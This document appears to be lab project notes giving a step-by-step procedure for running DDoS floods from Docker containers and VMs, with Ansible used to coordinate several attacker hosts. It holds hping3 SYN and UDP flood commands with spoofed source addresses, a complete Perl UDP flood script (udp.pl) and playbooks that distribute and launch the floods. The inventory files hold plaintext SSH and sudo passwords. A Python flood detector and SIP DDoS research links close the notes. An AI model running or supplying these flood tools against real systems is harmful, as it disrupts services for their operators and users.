---
tags: Project
---
[toc]

# SOP of DDoS via Docker/VM

## via Docker

- [docker commands](https://docs.docker.com/engine/reference/commandline/docker/)
- [Docker Notes Part 2 | Command operations](https://medium.com/@VisonLi/docker-%E5%85%A5%E9%96%80-%E7%AD%86%E8%A8%98-part-2-91e4dfa2b365)
- [Type of DDoS attack via hping3](https://www.slideshare.net/Himani-Singh/type-of-ddos-attacks-with-hping3-example)

### Basic Config

- Pull the image

```
docker pull ubuntu:latest
```

> same as ==docker pull registry.hub.docker.com/ubuntu:latest==

- Edit the image

```
docker run --name test -it ubuntu
docker run -t -i ubuntu /bin/bash
# apt-get update
# apt-get install sudo
# apt-get install vim
# apt-get install hping3
```

```
docker commit -m "Added Git package" -a "Starter" 88400ddfbf99 ubuntu:v2
```

> `-m` is followed by the commit message and `-a` attaches the author information; the remaining arguments are the container ID and the tag.

- Run a container

```
docker run --name mycontainer -it ubuntu /bin/bash
```

- Detach from a container without stopping it: `ctrl-p + ctrl-q`

- Export and import a container

```
docker export 243c32535da7 > ubuntu.tar
```

> Save the container as a local file

```
docker import ubuntu.tar ubuntu:v3.5
```

> Import the container as an image

#### Set ip address to single container

- First you need to create your own docker network (mynet123)

```
docker network create --subnet=172.18.0.0/16 mynet123
```

- Then, simply run the image (take ubuntu as example)

```
docker run --net mynet123 --ip 172.18.0.22 -it ubuntu bash
```

- Enable the `ip a` command inside the container

```
apt install -y iproute2
```

## via ansible

### SOP

#### Install module

```bash=
sudo apt-get install -y software-properties-common
sudo add-apt-repository -y ppa:ansible/ansible; sudo apt-get update
sudo apt-get install -y ansible sshpass
```

#### Config file

- /etc/hosts

```
172.24.4.93  attacker1
172.24.4.150 attacker2
172.24.4.164 attacker3
172.24.4.166 attacker4
172.24.4.173 attacker5
```

- /etc/ansible.cfg

```
[defaults]
host_key_checking = False
```

- Inventory.ini

```
[attackers]
localhost ansible_connection=local ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3
attacker2 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3
attacker3 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3
attacker4 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3
attacker5 ansible_connection=ssh ansible_user=ubuntu ansible_ssh_pass=aloha802.3 ansible_sudo_pass=aloha802.3 ansible_python_interpreter=/usr/bin/python3
```

- playbook.yaml

```yaml=
- hosts: attackers
  connection: ssh
  name: play_download
  tasks:
    - name: apt-get update & upgrade
      become: yes
      become_method: sudo
      apt:
        update_cache: yes
        upgrade: yes
      tags: up
    - name: install hping3
      become: yes
      become_method: sudo
      apt:
        name: hping3
      tags: attack-module
    - name: start attack
      become: yes
      become_method: sudo
      command: sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.79 --flood | sudo hping3 -p 5060 -S -a 10.21.22.164 192.168.35.79 --flood
      tags: attack
```

- multiple commands usage

```yaml=
command: "{{item}}"
with_items:
  - sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.79 --flood
  - sudo hping3 -p 5060 -S -a 10.21.22.164 192.168.35.79 --flood
tags: attack
```

### DDoS tools

#### hping3

- [Quick start for hping3](http://wiki.hping.org/94)
- [External tutorials and articles](http://wiki.hping.org/33)
- [hping man page](http://www.hping.org/manpage.html)

- TCP SYN Flooding

```bash=
sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.241 -i u1000
sudo hping3 -p 5060 -S -a 10.21.22.164 192.168.35.241 --flood
```

- UDP Flooding

```bash=
hping3 -c 5000 -d 150 --udp -p 5060 --flood 10.21.21.25
hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114
hping3 -c 5000 -d 80 --udp -p 7090 --flood 10.21.22.197
```

#### udp.pl

- UDP Flooding

```bash=
perl udp.pl <ip> <port> <time>
```

```perl=
#!/usr/bin/perl
#udp.pl by PRG oldTeam
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
  printf "$0 <ip> <port> <time>\n";
  printf "For more info visit #database/ \n";
  exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
printf "\e[1;32m********************************************\n";
printf "\e[1;31mFlooding ip -> $ip port -> $port \n\n";
printf "\e[1;37m#database udp \n";
printf "\e[1;32m********************************************\n";
if ($ARGV[1] ==0 && $ARGV[2] ==0) { goto randpackets; }
if ($ARGV[1] !=0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 perl) &"); goto packets; }
if ($ARGV[1] !=0 && $ARGV[2] ==0) { goto packets; }
if ($ARGV[1] ==0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 perl) &"); goto randpackets; }
packets:
for (;;) {
  $size=$rand x $rand x $rand;
  send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
  $size=$rand x $rand x $rand;
  $port=int(rand 65000) +1;
  send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
```

## Other config file in master

- play-perl.yaml

```yaml=
- hosts: attackers
  connection: ssh
  name: play_download
  tasks:
    - name: apt-get update & upgrade
      become: yes
      become_method: sudo
      apt:
        update_cache: yes
        upgrade: yes
        # force_apt_get: yes
        # cache_valid_time: 86400 # one day
      tags: up
    - name: create a directory if not exist
      file:
        path: ~/flooding
        state: directory
      tags: mkdir
    - name: Fetch the file from the attacker1 to master
      run_once: yes
      fetch:
        src: ~/udp.pl
        dest: ~/flooding/
        flat: yes
      when: "{{ inventory_hostname == 'ansible_node_attacker1' }}"
      tags: fetch
    - name: Copy the file from master to other attackers
      copy:
        src: ~/flooding/udp.pl
        dest: ~/flooding/
      tags: copy
    - name: attack
      command: cd flooding
      command: perl udp.pl #IPaddr 5060 100
      tags: attack
```

### Problems

- Building several VMs inside DevStack as the attack cluster did not work well
- The presumed cause is that VMs created inside the DevStack virtual network perform worse than external VMs (and the more of them there are, the more thinly DevStack's resources are spread)
```
sudo hping3 -p 8000 -S -a 10.21.22.164 192.168.35.79 --flood & sleep 20s; sudo kill $!
ssh ubuntu@192.168.32.149
```

### Related Research

> [how to write related research](https://wordvice.com.tw/%E5%A6%82%E4%BD%95%E5%AF%AB%E6%96%87%E7%8D%BB%E6%8E%A2%E8%A8%8E%E6%96%87%E7%8D%BB%E7%A0%94%E7%A9%B6literature-review/)

- [The Simulation for the SIP DDoS Attack](https://ieeexplore.ieee.org/document/5331555)
- [The Simulation for the VoIP DDoS Attack](https://ieeexplore.ieee.org/document/5089114)
- [SIP Flooding Attack Detection with a Multi-Dimensional Sketch Design](https://ieeexplore.ieee.org/document/6720187)
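The related work above is about detecting SIP flooding. As an added defender-side example, not part of the original SOP, the following flags the two traffic shapes the hping3 commands on this page produce (a SYN flood from one spoofed source with no handshakes completing, and a UDP burst at the SIP port 5060) over constructed flow records; the records, the 1-second window and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed flow records, not captured traffic: (t_seconds, src, dst, proto, dport, tcp_flags).
# 300 SYN-only packets from one spoofed source to 192.168.35.79:8000, 200 UDP packets from
# many sources to port 5060, plus two normal handshakes (SYN followed by ACK) on 22 and 443.
SAMPLE_FLOWS = (
    [(i * 0.001, "10.21.22.164", "192.168.35.79", "tcp", 8000, "S") for i in range(300)]
    + [(i * 0.002, f"10.0.{i % 7}.{i % 250}", "192.168.35.79", "udp", 5060, "") for i in range(200)]
    + [(0.5, "192.168.35.10", "192.168.35.79", "tcp", 22, "S"),
       (0.5, "192.168.35.10", "192.168.35.79", "tcp", 22, "A"),
       (0.6, "192.168.35.11", "192.168.35.79", "tcp", 443, "S"),
       (0.6, "192.168.35.11", "192.168.35.79", "tcp", 443, "A")]
)


def detect_floods(flows, window=1.0, syn_threshold=100, udp_threshold=100):
    """Bucket flows per (window slot, dst, proto, dport) and return one alert per bucket
    where SYN-only packets exceed syn_threshold while ACKs (handshake completions) stay
    below a tenth of them, or where UDP packets exceed udp_threshold. The distinct-source
    count tells a single spoofed source (hping3 -a) apart from --rand-source traffic."""
    buckets = defaultdict(lambda: {"syn": 0, "ack": 0, "udp": 0, "srcs": set()})
    for t, src, dst, proto, dport, flags in flows:
        b = buckets[(int(t // window), dst, proto, dport)]
        b["srcs"].add(src)
        if proto == "tcp":
            if "S" in flags and "A" not in flags:
                b["syn"] += 1
            elif "A" in flags:
                b["ack"] += 1
        elif proto == "udp":
            b["udp"] += 1

    alerts = []
    for (slot, dst, proto, dport), b in sorted(buckets.items()):
        if proto == "tcp" and b["syn"] >= syn_threshold and b["ack"] < b["syn"] // 10:
            alerts.append({"type": "syn_flood", "target": f"{dst}:{dport}", "window": slot,
                           "syn": b["syn"], "ack": b["ack"], "distinct_sources": len(b["srcs"])})
        elif proto == "udp" and b["udp"] >= udp_threshold:
            alerts.append({"type": "udp_flood", "target": f"{dst}:{dport}", "window": slot,
                           "packets": b["udp"], "distinct_sources": len(b["srcs"])})
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(SAMPLE_FLOWS):
        print(alert)
```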